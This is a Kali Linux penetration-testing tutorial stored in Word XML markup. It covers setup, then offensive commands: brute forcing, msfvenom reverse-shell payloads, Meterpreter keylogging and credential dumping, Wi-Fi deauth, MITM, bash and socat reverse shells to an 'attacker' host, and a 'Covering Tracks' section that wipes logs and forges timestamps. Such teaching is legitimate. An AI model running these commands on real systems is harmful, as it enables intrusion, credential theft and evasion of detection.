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6"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oikjaruypj2o" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali linux commands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Complete Guide From Scratch to Advanced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🐉 What is Kali Linux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Kali Linux is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Debian-based Linux distribution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintained by Offensive Security, purpose-built for penetration testing, digital forensics, and security research. It comes pre-loaded with 600+ security tools.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KALI LINUX FACTS                              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Developer:    Offensive Security    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Based on:     Debian Testing    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First release: 2013 (successor to BackTrack)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Default shell: zsh (bash also available)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Default DE:    XFCE / GNOME        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Architecture: x86, x64, ARM, ARM64 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Used for:     Penetration Testing, CTF, Forensics, Research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📦 PART 1 — Installation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Installation Options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1. Bare Metal     → Install directly on hardware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2. Virtual Machine → VMware / VirtualBox / Hyper-V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3. WSL2           → Windows Subsystem for Linux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4. Docker         → Container-based lightweight install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5. Live USB       → Boot without installing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6. Cloud          → AWS / Azure / GCP Kali image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7. Raspberry Pi   → ARM image for Pi 3/4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Install on VirtualBox (Recommended for Beginners)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Step 1: Download Kali Linux ISO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https://www.kali.org/get-kali/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Or download pre-built VM image (fastest)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https://www.kali.org/get-kali/#kali-virtual-machines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VirtualBox Recommended Settings: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RAM:          4GB minimum (8GB recommended)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CPU:          2+ cores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Storage:      80GB+ (dynamically allocated)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Network:      NAT + Host-Only Adapter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Display:      128MB video memory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3D Accel:     Enabled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Step 2: Import OVA (pre-built VM)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File → Import Appliance → select kali-linux-*.ova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Default credentials (VM image)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Username: kali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Password: kali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WSL2 Installation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Windows PowerShell (Administrator)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wsl --install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Install Kali from Microsoft Store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wsl --install -d kali-linux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Start Kali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wsl -d kali-linux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Install kali-linux-default tools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apt install -y kali-linux-default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Docker Installation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Pull official Kali image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docker pull kalilinux/kali-rolling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Run interactive Kali container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docker run -it --rm kalilinux/kali-rolling /bin/bash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Run with network access and persistent storage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docker run -it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--name kali-pentest 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--network host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-v $(pwd)/workspace:/root/workspace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kalilinux/kali-rolling /bin/bash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Inside container — install tools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apt update &amp;&amp; apt install -y kali-linux-headless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⚙️ PART 2 — Post-Installation Setup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First Boot Configuration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Update system (always do this first!)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apt update &amp;&amp; sudo apt full-upgrade -y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Install common tool metapackages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sudo apt install -y kali-linux-default     # Core tools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sudo apt install -y kali-linux-top10       # Top 10 tools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sudo apt install -y kali-linux-all         # ALL tools (15GB+)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Tool categories available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kali-tools-information-gathering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kali-tools-vulnerability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kali-tools-web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kali-tools-exploitation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kali-tools-post-exploitation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kali-tools-forensics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kali-tools-wireless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kali-tools-reverse-engineering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kali-tools-passwords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kali-tools-sniffing-spoofing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kali-tools-reporting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Change default password (IMPORTANT!)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passwd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Set up SSH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sudo systemctl enable ssh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sudo systemctl start ssh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Edit /etc/ssh/sshd_config to allow root if needed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Check SSH status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sudo systemctl status ssh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Essential System Configuration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Set timezone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sudo timedatectl set-timezone Asia/Kolkata  # Change to your TZ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timedatectl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Set hostname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sudo hostnamectl set-hostname kali-pentest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hostname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Configure network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ip addr show          # Show interfaces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ip route              # Show routing table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nmtui                 # TUI network manager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nmcli connection show # List connections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Enable firewall (optional on Kali)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sudo ufw enable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sudo ufw status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Install additional packages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sudo apt install -y \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git curl wget vim tmux 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python3 python3-pip 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golang-go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ruby ruby-dev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build-essential \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net-tools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terminator     # Better terminal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Configure aliases (add to ~/.zshrc or ~/.bashrc)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cat &gt;&gt; ~/.zshrc &lt;&lt; 'EOF'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Kali Aliases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alias update='sudo apt update &amp;&amp; sudo apt full-upgrade -y'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alias ll='ls -la --color=auto'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alias la='ls -la'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alias ports='netstat -tulnp'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alias myip='curl ifconfig.me'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alias localip='hostname -I'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alias webserver='python3 -m http.server 8080'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alias pyenv='source venv/bin/activate'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Pentest shortcuts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alias msf='msfconsole -q'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alias bp='burpsuite &amp;'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alias ff='firefox &amp;'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source ~/.zshrc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🐚 PART 3 — Linux Fundamentals for Pentesting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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File System Structure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               # Root directory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/bin            # Essential binaries (ls, cp, mv)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/sbin           # System binaries (iptables, reboot)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/etc            # Configuration files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/home           # User home directories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/root           # Root user home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/var            # Variable data (logs, databases)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/tmp            # Temporary files (cleared on reboot)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/opt            # Optional software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/usr            # User programs and utilities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/proc           # Virtual filesystem (process info)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/dev            # Device files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/mnt  /media    # Mount points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Pentest-relevant locations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/usr/share/wordlists/    # Wordlists (rockyou.txt etc)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/usr/share/nmap/         # Nmap scripts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/usr/share/metasploit-framework/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/var/log/                # System logs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/etc/passwd              # User accounts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/etc/shadow              # Password hashes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/etc/hosts               # Host file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/etc/resolv.conf         # DNS config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Essential Linux Commands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── File Operations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ls -la                    # List with details + hidden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ls -lah                   # Human-readable sizes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find / -name "*.conf" 2&gt;/dev/null  # Find all .conf files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find / -perm -4000 2&gt;/dev/null     # Find SUID binaries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find / -writable 2&gt;/dev/null       # Find writable files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locate passwd                       # Fast file search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which nmap                          # Find tool path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whereis nmap                        # Find binary + man page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── File Content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cat /etc/passwd                    # View file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head -20 /var/log/syslog           # First 20 lines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tail -f /var/log/auth.log          # Live log follow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less /etc/shadow                   # Scrollable view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grep -r "password" /etc/ 2&gt;/dev/null  # Search files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grep -v "^#" /etc/passwd           # Remove comments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awk -F: '{print $1}' /etc/passwd   # Print first field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cut -d: -f1 /etc/passwd            # Cut by delimiter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── Permissions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chmod 755 script.sh      # rwxr-xr-x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chmod +x script.sh       # Add execute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chmod 600 id_rsa         # SSH key permission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chown root:root file     # Change owner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ls -la | grep "^-rws"   # Find SUID files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── Process Management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ps aux                   # All running processes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ps aux | grep metasploit # Filter processes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top                      # Interactive process viewer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htop                     # Better top (install htop)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kill -9 PID              # Force kill process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killall firefox          # Kill by name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pgrep -l python          # Find process by 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jobs                     # Background jobs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bg %1                    # Resume in background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fg %1                    # Bring to foreground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nohup command &amp;          # Run immune to hangup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── Network Commands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ip addr show             # Show IP addresses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ip addr add 192.168.1.100/24 dev eth0  # Add IP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ip link set eth0 up      # Bring interface up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ip route show            # Routing table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ip route add default via 192.168.1.1   # Add default route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netstat -tulnp           # Listening ports (old)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ss -tulnp                # Listening ports (new)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ss -s                    # Socket statistics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ping -c 4 8.8.8.8        # Test connectivity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traceroute 8.8.8.8       # Trace route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nslookup target.com      # DNS lookup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dig target.com           # Detailed DNS lookup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dig +short target.com A  # Quick A record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host target.com          # Simple DNS lookup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whois target.com         # WHOIS information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── Archiving &amp; Compression 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tar -czf archive.tar.gz /directory    # Compress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tar -xzf archive.tar.gz               # Extract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tar -czf archive.tar.gz --exclude='.git' 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zip -r archive.zip directory/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unzip archive.zip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gzip file                             # Compress single file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gunzip file.gz                        # Decompress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── Text Processing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sed 's/old/new/g' file   # Replace text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awk '{print $1}' file    # Print column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sort -u file             # Sort + unique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uniq -c sorted_file      # Count duplicates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tr -d '\r' file          # Remove carriage returns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wc -l file               # Count lines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diff file1 file2         # Compare files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xxd file | head          # Hex dump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strings binary           # Extract readable strings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── Scripting Essentials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For loop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ip in $(seq 1 254); do echo "192.168.1.$ip"; done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While loop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while read line; do echo $line; done &lt; file.txt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If statement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if [ -f /etc/passwd ]; then echo "exists"; fi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Command substitution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result=$(whoami)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echo "Running as: $result"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Pipe and redirect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command | grep "error" &gt; errors.txt 2&gt;&amp;1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command 2&gt;/dev/null     # Suppress errors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── Environment Variables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export PATH=$PATH:/opt/tools    # Add to PATH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export GOPATH=$HOME/go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printenv                        # Show all env vars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echo $HOME                      # Print variable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env                             # Show environment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Bash Scripting for Pentesting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── Basic Pentest Script Template ─────────────────────────────────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TARGET=$1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OUTPUT_DIR="./results/${TARGET}_$(date +%Y%m%d)"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Colors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RED='\033[0;31m'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GREEN='\033[0;32m'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YELLOW='\033[0;33m'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NC='\033[0m' # No Color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function banner()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echo -e "${GREEN}"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echo "╔══════════════════════════════╗"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echo "║  Automated Recon Script      ║"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echo "╚══════════════════════════════╝"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echo -e "${NC}"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function check_tools()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TOOLS=("nmap" "gobuster" "nikto" "whatweb")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for tool in "${TOOLS[@]}"; do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if ! command -v $tool &amp;&gt;/dev/null; then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echo -e "${RED}[-] Missing: $tool${NC}"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sudo apt install -y $tool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echo -e "${GREEN}[+] Found: $tool${NC}"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function port_scan()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echo -e "${YELLOW}[*] Running port scan on $TARGET${NC}"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mkdir -p "$OUTPUT_DIR"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nmap -sCV -p- --min-rate 5000 -oA "${OUTPUT_DIR}/nmap" $TARGET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echo -e "${GREEN}[+] Port scan complete${NC}"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function web_recon()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echo -e "${YELLOW}[*] Web reconnaissance${NC}"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whatweb $TARGET -v &gt; "${OUTPUT_DIR}/whatweb.txt"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nikto -h $TARGET -o "${OUTPUT_DIR}/nikto.txt"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gobuster dir -u "http://$TARGET" \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-w /usr/share/wordlists/dirb/common.txt \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-o "${OUTPUT_DIR}/gobuster.txt"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if [ -z "$TARGET" ]; then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echo "Usage: $0 &lt;target&gt;"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check_tools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port_scan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web_recon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echo -e "${GREEN}[+] Recon complete. Results in: $OUTPUT_DIR${NC}"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🔧 PART 4 — Kali Tool Categories (Deep Dive)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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Information Gathering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── Network Scanning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nmap — THE network scanner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nmap -sn 192.168.1.0/24             # Ping sweep (host discovery)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nmap -sV -sC -p- target.com         # Full version + script scan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nmap -sS -sV -O target.com          # SYN scan + OS detection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nmap -A -T4 target.com              # Aggressive scan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nmap -sU -p 53,161,162 target.com   # UDP scan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nmap -p 80,443 --script=http-title target.com  # Web titles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nmap --script vuln target.com       # Vulnerability scripts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nmap -oA scan_results target.com    # Save all formats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Mass scanning with masscan (faster than nmap)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sudo masscan -p1-65535 192.168.1.0/24 --rate=1000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── DNS Enumeration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dnsenum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dnsenum target.com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dnsrecon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dnsrecon -d target.com -t std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dnsrecon -d target.com -t brute -D /usr/share/wordlists/dnsmap.txt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subfinder — subdomain discovery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subfinder -d target.com -o subdomains.txt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amass — comprehensive subdomain enumeration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amass enum -d target.com -o amass_results.txt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amass intel -d target.com -whois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theHarvester — email/subdomain/OSINT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theHarvester -d target.com -b google,bing,linkedin,dnsdumpster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── Web Reconnaissance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whatweb — web technology fingerprinting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whatweb -a 3 https://target.com -v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wafw00f — WAF detection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wafw00f https://target.com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nikto — web server scanner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nikto -h https://target.com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nikto -h https://target.com -ssl -port 443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gobuster / dirbuster — directory bruteforce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gobuster dir -u https://target.com \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-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \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-x php,html,txt,js \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-t 50 \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-o gobuster.txt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feroxbuster — recursive directory bruteforce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feroxbuster -u https://target.com \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-w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \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--depth 3 \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--threads 50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ffuf — versatile fuzzer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ffuf -u https://target.com/FUZZ \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-w /usr/share/wordlists/dirb/common.txt \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-mc 200,301,302 \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-c -v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── OSINT Tools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maltego — visual OSINT platform (GUI)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maltego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recon-ng — OSINT framework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recon-ng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&gt; marketplace install all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&gt; workspaces create target.com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&gt; db insert domains target.com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&gt; modules load recon/domains-hosts/hackertarget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&gt; run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spiderfoot — automated OSINT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spiderfoot -s target.com -m all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shodan (CLI)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pip install shodan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shodan init YOUR_API_KEY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shodan search "apache target.com"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shodan host 93.184.216.34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── OpenVAS / Greenbone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Full vulnerability scanner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sudo apt install -y openvas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sudo gvm-setup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sudo gvm-start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Access: https://127.0.0.1:9392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── Nikto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nikto -h target.com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nikto -h target.com -Plugins "headers;shellshock;ssi"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── Nuclei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sudo apt install -y nuclei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nuclei -u https://target.com -t cves/ -severity critical,high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nuclei -u https://target.com -tags cve,sqli,xss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nuclei -l urls.txt -t nuclei-templates/ -o results.txt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── WPScan — WordPress Scanner ───────────────────────────────────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wpscan --url https://target.com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wpscan --url https://target.com --enumerate u,p,t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wpscan --url https://target.com \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--passwords /usr/share/wordlists/rockyou.txt \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--usernames admin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── SQLmap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sqlmap -u "https://target.com/?id=1" --dbs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sqlmap -u "https://target.com/login" \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--data="user=admin&amp;pass=test" \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--level=5 --risk=3 \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--batch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── CMSmap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cmsmap https://target.com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Password Attacks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── Wordlists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ls /usr/share/wordlists/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rockyou.txt (most famous)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gunzip /usr/share/wordlists/rockyou.txt.gz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SecLists (comprehensive)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sudo apt install -y seclists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ls /usr/share/seclists/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 ── Hashcat — GPU password cracking ─────────────────────────────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hashcat --help | grep -i md5   # Find hash modes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hashcat -m 0 hash.txt rockyou.txt             # MD5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hashcat -m 100 hash.txt rockyou.txt           # SHA1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hashcat -m 1800 hash.txt rockyou.txt          # SHA-512 crypt ($6$)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hashcat -m 3200 hash.txt rockyou.txt          # bcrypt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hashcat -m 1000 ntlm.txt rockyou.txt          # NTLM (Windows)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hashcat -m 0 -a 3 hash.txt ?u?l?l?l?d?d     # Mask attack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hashcat -m 0 -a 6 hash.txt words.txt ?d?d?d  # Hybrid attack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── John the Ripper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john --list=formats | grep md5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john --format=raw-md5 hash.txt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john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt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john --show hash.txt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Extract shadow hash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unshadow /etc/passwd /etc/shadow &gt; combined.txt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john combined.txt --wordlist=rockyou.txt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── Hydra — Online brute force ────────────────────────────────────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hydra -l admin -P rockyou.txt target.com http-post-form \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"/login:user=^USER^&amp;pass=^PASS^:F=incorrect" \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-t 10 -V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hydra -L users.txt -P passwords.txt ssh://target.com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hydra -l root -P rockyou.txt ftp://target.com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hydra -l admin -P rockyou.txt rdp://target.com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hydra -L users.txt -P passwords.txt mysql://target.com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── Medusa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medusa -h target.com -u admin -P rockyou.txt -M ssh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── CrackMapExec — Windows/AD password spraying ──────────────────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crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt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crackmapexec ssh 192.168.1.0/24 -u admin -p password123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── Hashid — Identify hash type ──────────────────────────────────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hashid '$2y$10$abcdefghijklmnopqrstuuVGKmYbzHfA8K'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hash-identifier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── Hash-buster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hash-buster -s 5f4dcc3b5aa765d61d8327deb882cf99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Exploitation Framework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── Metasploit Framework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msfconsole -q                     # Start quietly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Basic Metasploit workflow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msf&gt; search type:exploit platform:windows name:smb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msf&gt; use exploit/windows/smb/ms17_010_eternalblue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msf&gt; info                         # Show module info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msf&gt; show options                 # Show required options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msf&gt; set RHOSTS 192.168.1.100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msf&gt; set LHOST 192.168.1.50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msf&gt; set LPORT 4444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msf&gt; check                        # Check if target is vulnerable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msf&gt; run                          # Execute exploit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Payloads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msf&gt; show payloads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msf&gt; set payload windows/x64/meterpreter/reverse_tcp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msf&gt; set payload linux/x86/meterpreter/reverse_tcp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Generate payloads with msfvenom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msfvenom -p windows/x64/meterpreter/reverse_tcp \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LHOST=192.168.1.50 LPORT=4444 \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-f exe -o payload.exe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msfvenom -p linux/x86/shell_reverse_tcp \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LHOST=192.168.1.50 LPORT=4444 \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-f elf -o shell.elf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msfvenom -p php/reverse_php \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LHOST=192.168.1.50 LPORT=4444 \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-f raw -o shell.php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msfvenom -p java/jsp_shell_reverse_tcp \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LHOST=192.168.1.50 LPORT=4444 \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-f war -o shell.war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Meterpreter commands (after exploitation)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meterpreter&gt; sysinfo            # System info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meterpreter&gt; getuid             # Current user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meterpreter&gt; getsystem          # Privilege escalation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meterpreter&gt; hashdump           # Dump password hashes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meterpreter&gt; ps                 # Process list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meterpreter&gt; migrate 1234       # Migrate to process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meterpreter&gt; shell              # Drop to shell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meterpreter&gt; upload file.exe    # Upload file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meterpreter&gt; download file.txt  # Download file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meterpreter&gt; screenshot         # Take screenshot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meterpreter&gt; keyscan_start      # Start keylogger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meterpreter&gt; keyscan_dump       # Dump keystrokes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meterpreter&gt; portfwd add -l 8080 -p 80 -r 192.168.1.1  # Port forward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meterpreter&gt; run post/windows/gather/credentials/credential_collector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meterpreter&gt; background         # Background session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msf&gt; sessions -l                # List sessions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msf&gt; sessions -i 1              # Interact with session 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 ── Social Engineering Toolkit (SET) ─────────────────────────────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sudo setoolkit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1) Social-Engineering Attacks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2) Website Attack Vectors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3) Credential Harvester Attack Method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 ── BeEF — Browser Exploitation Framework ────────────────────────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sudo beef-xss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Access: http://127.0.0.1:3000/ui/panel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 Default: admin/beef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Web Application Testing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── Burp Suite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burpsuite &amp;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Community edition (free)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Professional edition (paid — for real pentesting)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Configure browser proxy: 127.0.0.1:8080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── OWASP ZAP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zaproxy &amp;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Open source web scanner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 Good for automated scanning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 ── SQLmap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sqlmap -r request.txt --level=5 --risk=3 --dbs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sqlmap -u "https://target.com/api" --data='{"id":1}' \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--headers="Content-Type: application/json"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── XSS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XSSer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xsser --url "https://target.com/search?q=XSS"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dalfox — fast XSS scanner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dalfox url https://target.com/search?q=test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 ── JWT attacks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 jwt_tool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git clone https://github.com/ticarpi/jwt_tool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python3 jwt_tool.py TOKEN -X a  # alg:none attack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── Commix — Command injection ────────────────────────────────────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commix --url="https://target.com/ping?ip=127.0.0.1" \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--level=3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── Wfuzz — Web fuzzer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wfuzz -c -z file,rockyou.txt \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-d "user=admin&amp;pass=FUZZ" \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https://target.com/login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Wireless Attacks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 ── Aircrack-ng Suite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(Requires wireless adapter with monitor mode support)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 Put interface in monitor mode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sudo airmon-ng check kill         # Kill interfering processes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sudo airmon-ng start wlan0        # Start monitor mode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 Creates wlan0mon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Scan for networks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sudo airodump-ng wlan0mon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 Capture specific network handshake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sudo airodump-ng -c 6 \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--bssid AA:BB:CC:DD:EE:FF \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-w capture wlan0mon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 Deauth attack (force handshake)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sudo aireplay-ng -0 10 \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-a AA:BB:CC:DD:EE:FF \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-c 11:22:33:44:55:66 \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wlan0mon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Crack WPA2 handshake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aircrack-ng capture-01.cap \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-w /usr/share/wordlists/rockyou.txt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── Wifite2 — Automated WiFi attacks ─────────────────────────────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sudo wifite --all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 ── Hashcat WiFi cracking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 Convert cap to hashcat format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cap2hccapx capture-01.cap capture.hccapx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hashcat -m 2500 capture.hccapx rockyou.txt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 ── Evil-Twin / Rogue AP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hostapd-wpe — rogue access point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airbase-ng — create fake AP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 ── Bluetooth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hciconfig hci0 up       # Enable Bluetooth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hcitool scan            # Scan for devices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hcitool lescan          # BLE scan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btscanner               # Bluetooth scanner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Post-Exploitation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── Linux Privilege Escalation ────────────────────────────────────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LinPEAS — automated PE script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curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh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 Manual checks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SUID binaries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find / -perm -4000 -type f 2&gt;/dev/null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Writable /etc/passwd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ls -la /etc/passwd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Sudo permissions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sudo -l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 Cron jobs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cat /etc/crontab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ls /etc/cron.*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 World-writable files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find / -writable -type f 2&gt;/dev/null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Services running as root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ps aux | grep root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 PATH injection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echo $PATH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 Kernel exploits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searchsploit $(uname -r)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── Windows Post-Exploitation (via Meterpreter) ───────────────────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meterpreter&gt; run post/multi/recon/local_exploit_suggester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meterpreter&gt; run post/windows/gather/credentials/credential_collector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meterpreter&gt; run post/windows/gather/enum_shares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meterpreter&gt; run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24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 ── PowerSploit / PowerShell Empire ──────────────────────────────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 Download PowerSploit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git clone https://github.com/PowerShellMafia/PowerSploit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── Mimikatz equivalent (Linux) ──────────────────────────────────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 Run via Meterpreter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meterpreter&gt; load kiwi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meterpreter&gt; creds_all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meterpreter&gt; lsa_dump_sam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meterpreter&gt; lsa_dump_secrets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── Network Pivoting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SSHuttle — VPN over SSH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sshuttle -r user@jumphost 192.168.2.0/24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 Chisel — TCP tunnel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 On attacker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./chisel server -p 9999 --reverse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 On target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./chisel client attacker_ip:9999 R:8080:internal:80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 Proxychains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sudo vim /etc/proxychains4.conf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Add: socks5 127.0.0.1 1080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proxychains nmap -sT 192.168.2.0/24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── Covering Tracks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 Clear bash history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history -c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cat /dev/null &gt; ~/.bash_history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unset HISTFILE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Clear logs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echo "" &gt; /var/log/auth.log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echo "" &gt; /var/log/syslog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 Timestomp (change file timestamps)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touch -t 202001010000 suspicious_file.txt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Network Analysis &amp; Sniffing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 ── Wireshark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wireshark &amp;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Capture filter: host 192.168.1.100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 Display filter: http.request.method == "POST"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TLS decryption: add SSLKEYLOGFILE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 ── tcpdump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sudo tcpdump -i eth0                    # Capture all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sudo tcpdump -i eth0 port 80            # HTTP only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sudo tcpdump -i eth0 -w capture.pcap    # Save to file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sudo tcpdump -r capture.pcap            # Read from file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sudo tcpdump -i eth0 "tcp and host 192.168.1.100"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sudo tcpdump -i eth0 -A port 80        # ASCII output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 ── Responder — LLMNR/NBT-NS poisoning ───────────────────────────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sudo responder -I eth0 -wfrd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 Captures NTLMv2 hashes from Windows machines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 Crack with hashcat: hashcat -m 5600 hashes.txt rockyou.txt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 ── Ettercap — MITM attacks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sudo ettercap -G    # GUI mode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sudo ettercap -T -i eth0 -M arp /192.168.1.1// /192.168.1.100//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 ── arp-scan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sudo arp-scan -l                       # Local network scan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sudo arp-scan 192.168.1.0/24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 ── Netcat — Swiss army knife ────────────────────────────────────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nc -lvnp 4444                          # Listen for connections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nc target.com 80                       # Connect to port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nc -w 3 target.com 22                  # Port check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# Reverse shell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nc -lvnp 4444                          # Attacker listens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bash -i &gt;&amp; /dev/tcp/attacker/4444 0&gt;&amp;1 # Target sends shell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 File transfer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nc -lvnp 9999 &gt; received_file          # Receiver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nc target.com 9999 &lt; file_to_send      # Sender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── Socat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socat TCP-L:4444 -                     # Listen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socat TCP:attacker:4444 EXEC:/bin/bash # Reverse shell (stable)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── ncat (nmap's netcat)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ncat -lvnp 4444 --ssl                  # SSL listener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ncat target.com 4444 -e /bin/bash      # Bind shell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🏋️ PART 5 — Practice Environments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000032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Legal Practice Labs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 ── Self-Hosted Vulnerable VMs ────────────────────────────────────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 Metasploitable 2/3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wget https://sourceforge.net/projects/metasploitable/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 Import into VirtualBox/VMware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 DVWA (Damn Vulnerable Web Application)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docker run -d -p 80:80 vulnerables/web-dvwa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VulnHub — downloadable VMs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https://www.vulnhub.com/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 HackTheBox — online labs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 https://www.hackthebox.com/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# Install HTB tool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pip3 install htb-toolkit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 TryHackMe — guided learning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https://tryhackme.com/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 PentesterLab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 https://pentesterlab.com/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# OWASP WebGoat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docker run -p 8080:8080 webgoat/goat-and-wolf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 bWAPP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docker run -d -p 80:80 raesene/bwapp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Vulhub — Docker vulnerable environments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git clone https://github.com/vulhub/vulhub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cd vulhub/log4j/CVE-2021-44228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 ── Network Practice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 GNS3 — network simulation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EVE-NG — enterprise lab simulation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 Packet Tracer — Cisco specific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🛡️ PART 6 — Certifications Roadmap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BEGINNER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CompTIA Security+    → Foundation security concepts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CompTIA Network+     → Networking fundamentals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INTERMEDIATE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eJPT (eLearnSecurity) → Practical pentesting basics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CEH (EC-Council)     → Certified Ethical Hacker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CompTIA PenTest+     → Pentest methodology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OSCP (Offensive Security) → Most respected pentest cert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- 24-hour practical exam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- PWK (PEN-200) course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- Requires real exploitation skills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OSEP (Offensive Security) → Advanced pentesting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OSED (Offensive Security) → Exploit development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OSWE (Offensive Security) → Web application attacks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CRTO (Zero-Point Security) → Red team operations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EXPERT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OSCE3 → OSCP + OSEP + OSWE + OSED combined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GXPN  → GIAC exploit researcher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SPECIALIZATIONS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AWS Security Specialty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CPTS (HackTheBox)   → Comprehensive pentest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BSCP (Burp Suite)   → Web application security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⚡ PART 7 — Advanced Kali Configuration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 ── Terminal Multiplexer (tmux) ────────────────────────────────────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sudo apt install -y tmux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 tmux config (~/.tmux.conf)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cat &gt; ~/.tmux.conf &lt;&lt; 'EOF'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set -g default-terminal "screen-256color"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set -g history-limit 50000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set -g mouse on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bind | split-window -h -c "#{pane_current_path}"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bind - split-window -v -c "#{pane_current_path}"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set -g pane-border-style fg=cyan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set -g pane-active-border-style fg=green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 tmux usage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tmux new -s pentest          # New session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tmux attach -t pentest       # Attach session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Ctrl+b |                     # Split vertical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Ctrl+b -                     # Split horizontal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Ctrl+b arrows                # Navigate panes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Ctrl+b d                     # Detach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 ── VPN Setup for HackTheBox/THM ─────────────────────────────────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sudo openvpn yourlab.ovpn &amp;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sudo openvpn --config lab.ovpn --daemon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── Custom Tool Installation ──────────────────────────────────────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 Go tools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go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest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go install github.com/projectdiscovery/httpx/cmd/httpx@latest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go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest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go install github.com/ffuf/ffuf/v2@latest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go install github.com/OJ/gobuster/v3@latest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Add Go bin to PATH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echo 'export PATH=$PATH:$HOME/go/bin' &gt;&gt; ~/.zshrc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 Python tools via pipx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pipx install impacket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pipx install crackmapexec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pipx install bloodhound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 ── Kali in the Cloud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 AWS — Official Kali AMI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 Search: Kali Linux in AWS Marketplace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 DigitalOcean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Create droplet → Marketplace → Kali Linux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# Linode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Create Linode → Marketplace → Kali Linux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 ── Kali Undercover Mode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kali-undercover    # Makes Kali look like Windows 10!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📋 PART 8 — Pentesting Methodology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STANDARD PENTEST PHASES                                       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1. PLANNING        → Scope, rules, authorization, goals      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2. RECONNAISSANCE  → Passive + Active info gathering         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3. SCANNING        → Port, service, vulnerability scanning    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4. EXPLOITATION    → Gaining initial access                   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5. POST-EXPLOIT    → Persistence, lateral movement        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6. REPORTING       → Document findings, remediation           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7. REMEDIATION     → Re-test after fixes                     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 ── Report Writing Tools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# Dradis — collaborative reporting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sudo apt install -y dradis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 Faraday — security management platform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pip install faradaysec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 Ghostwriter — professional pentest reporting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 https://github.com/GhostManager/Ghostwriter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 Serpico — report template engine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 https://github.com/SerpicoProject/Serpico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 ── Evidence Collection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# Screenshot tool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scrot screenshot.png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flameshot gui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 Screen recording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recordmydesktop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obs-studio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# Note-taking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sudo apt install -y cherrytree obsidian keepassxc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 Password manager for engagement credentials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keepassxc &amp;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🔑 Key Takeaways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KALI LINUX MASTERY PATH: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Week 1-2:   Linux fundamentals, file system, bash scripting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Week 3-4:   Networking concepts, nmap, tcpdump, Wireshark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Month 2:    Web attacks (Burp Suite, SQLmap, XSS tools)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Month 3:    Exploitation (Metasploit, manual exploits)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Month 4:    Post-exploitation, pivoting, persistence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Month 5-6:  Wireless, Active Directory, report writing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Ongoing:    CTFs (HackTheBox, TryHackMe, VulnHub)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Certification study (OSCP recommended)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GOLDEN RULES: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Always have written authorization before testing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Practice ONLY on your own systems or authorized labs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 everything — logs, screenshots, findings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responsible disclosure for real vulnerabilities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updated — subscribe to CVE feeds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Join communities: r/netsec, HackTheBox forums, Discord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Kali Linux mastery is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">journey not a destination</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the best practitioners combine deep technical knowledge with creative thinking, methodical approach, and strong report writing skills.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